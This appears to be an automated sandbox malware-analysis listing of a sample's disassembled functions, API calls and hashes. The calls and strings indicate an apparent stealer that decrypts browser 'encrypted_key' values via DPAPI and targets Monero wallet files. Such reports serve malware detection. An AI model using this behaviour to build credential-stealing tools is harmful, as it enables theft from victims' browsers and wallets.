                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 21fa532a82663a73446141241cb51f48b27579394bc50229f40ef37ddfb0cc4c
                            • Instruction ID: 31456812d2c44510df4a4f064bc9e350f613d44af6642b557bb520cb3254bcd8
                            • Opcode Fuzzy Hash: 21fa532a82663a73446141241cb51f48b27579394bc50229f40ef37ddfb0cc4c
                            • Instruction Fuzzy Hash: 605130B1A0010CAACB04FBA0DC52DFD7378AF45340F408528F90A66492EF746A0EDBA2
                            Function 000F3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: b70f31c3d1c8bf6558411eaf44b081d491f2229ed6eba6975d9cff1f08c53f82
                            • Instruction ID: 4fce6042376f22aee95e0d0728c2ef874bdf16f2b17a6237f25f1d7a2f092356
                            • Opcode Fuzzy Hash: b70f31c3d1c8bf6558411eaf44b081d491f2229ed6eba6975d9cff1f08c53f82
                            • Instruction Fuzzy Hash: 724153B1D1420DEBCB04EFA4D845AFEB774AF48314F00C018E615B6691DB756A09EFA2
                            Function 000E9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000E99EC
                              • Part of subcall function 000E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000E9A11
                              • Part of subcall function 000E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000E9A31
                              • Part of subcall function 000E99C0: ReadFile.KERNEL32(000000FF,?,00000000,000E148F,00000000), ref: 000E9A5A
                              • Part of subcall function 000E99C0: LocalFree.KERNEL32(000E148F), ref: 000E9A90
                              • Part of subcall function 000E99C0: CloseHandle.KERNEL32(000000FF), ref: 000E9A9A
                              • Part of subcall function 000F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000F8E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000E9D39
                              • Part of subcall function 000E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000E4EEE,00000000,00000000), ref: 000E9AEF
                              • Part of subcall function 000E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000E4EEE,00000000,?), ref: 000E9B01
                              • Part of subcall function 000E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000E4EEE,00000000,00000000), ref: 000E9B2A
                              • Part of subcall function 000E9AC0: LocalFree.KERNEL32(?,?,?,?,000E4EEE,00000000,?), ref: 000E9B3F
                              • Part of subcall function 000E9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000E9B84
                              • Part of subcall function 000E9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 000E9BA3
                              • Part of subcall function 000E9B60: LocalFree.KERNEL32(?), ref: 000E9BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 2c1593ba9652da21723ec2b2f96fee7730ca238398c36fdf7db985d90505fe20
                            • Instruction ID: b7c2f63bea1b4387e64295e0f07a220b017e0b7da10224ae242a5bb676359743
                            • Opcode Fuzzy Hash: 2c1593ba9652da21723ec2b2f96fee7730ca238398c36fdf7db985d90505fe20
                            • Instruction Fuzzy Hash: 59312FB6D1021DAFCF14DBE5DC85AEEB7B8AF48304F144519EA05B7242EB749A04CBA1
                            Function 000F8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001005B7), ref: 000F86CA
                            • Process32First.KERNEL32(?,00000128), ref: 000F86DE
                            • Process32Next.KERNEL32(?,00000128), ref: 000F86F3
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • CloseHandle.KERNEL32(?), ref: 000F8761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: be5d357d5429e681e495c563e38b08c3d65a7545979231dd5a356068551d2829
                            • Instruction ID: 7cfe4908b6380db70879a00104d6bdd193b900c2dc69fa3026597b5c9f8ad46a
                            • Opcode Fuzzy Hash: be5d357d5429e681e495c563e38b08c3d65a7545979231dd5a356068551d2829
                            • Instruction Fuzzy Hash: E8318FB1A0121CABCB25EF54CC41FEEB778EB45700F108199E20DA65A1DF746A45DFA1
                            Function 000F7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00100E00,00000000,?), ref: 000F79B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F79B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00100E00,00000000,?), ref: 000F79C4
                            • wsprintfA.USER32 ref: 000F79F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: f2f715569c41aa8b7988c0256913a99d97488637f04a0e353e9a393dc6521645
                            • Instruction ID: 5cd56e9b204bc2fa3975137bcff1cfa769e45764347395b9b360201d320ab1a4
                            • Opcode Fuzzy Hash: f2f715569c41aa8b7988c0256913a99d97488637f04a0e353e9a393dc6521645
                            • Instruction Fuzzy Hash: 281115B2904518ABCB249FC9DD45BBEBBFCEB48B11F10421AF605A2280E3795941DBB1
                            Function 000F92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(000F3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,000F3AEE,?), ref: 000F92FC
                            • GetFileSizeEx.KERNEL32(000000FF,000F3AEE), ref: 000F9319
                            • CloseHandle.KERNEL32(000000FF), ref: 000F9327
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID:
                            • API String ID: 1378416451-0
                            • Opcode ID: 62f83783a0e83148a5a94ee7d9280b73a826bd2e6ffb5f596db20c57b26e84be
                            • Instruction ID: 65687868b70a94fe352d6f94c4ea3b6a6b1d83f7ae7dde2f8ba7955edd5c893d
                            • Opcode Fuzzy Hash: 62f83783a0e83148a5a94ee7d9280b73a826bd2e6ffb5f596db20c57b26e84be
                            • Instruction Fuzzy Hash: 02F04F35E40208BBDB20DFF4DC49FAE77F9AB48710F10C258BA51A72C0D67097019B44
                            Function 000FC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 000FC74E
                              • Part of subcall function 000FBF9F: __amsg_exit.LIBCMT ref: 000FBFAF
                            • __getptd.LIBCMT ref: 000FC765
                            • __amsg_exit.LIBCMT ref: 000FC773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 000FC797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: f076fb7620e64569e0bad498316706fb5fe99fafb300ee34ab812efbe68b83fe
                            • Instruction ID: 7f1427f1d9bc7b5693492467475e6cb03ccf4b57339a9e10eb6902601a802f40
                            • Opcode Fuzzy Hash: f076fb7620e64569e0bad498316706fb5fe99fafb300ee34ab812efbe68b83fe
                            • Instruction Fuzzy Hash: 12F06D32A0870C9BE760BBB89947BBD33A06F00720F244159F644AA9D3DB685940BE56
                            Function 000F4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000F8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 000F4F7A
                            • lstrcat.KERNEL32(?,00101070), ref: 000F4F97
                            • lstrcat.KERNEL32(?,012291A8), ref: 000F4FAB
                            • lstrcat.KERNEL32(?,00101074), ref: 000F4FBD
                              • Part of subcall function 000F4910: wsprintfA.USER32 ref: 000F492C
                              • Part of subcall function 000F4910: FindFirstFileA.KERNEL32(?,?), ref: 000F4943
                              • Part of subcall function 000F4910: StrCmpCA.SHLWAPI(?,00100FDC), ref: 000F4971
                              • Part of subcall function 000F4910: StrCmpCA.SHLWAPI(?,00100FE0), ref: 000F4987
                              • Part of subcall function 000F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000F4B7D
                              • Part of subcall function 000F4910: FindClose.KERNEL32(000000FF), ref: 000F4B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 82666191883b869d951b985356b8769359daafa31671e0e01958c29de6e3616e
                            • Instruction ID: 60105d13d9b9d7c954cd1f0c140e9f59b5fa3dd1f5ce27555009eb364b8a1393
                            • Opcode Fuzzy Hash: 82666191883b869d951b985356b8769359daafa31671e0e01958c29de6e3616e
                            • Instruction Fuzzy Hash: F821CB76900208ABC765F770DC46EEE333CAB55300F00454CB79993582EEB496C98B92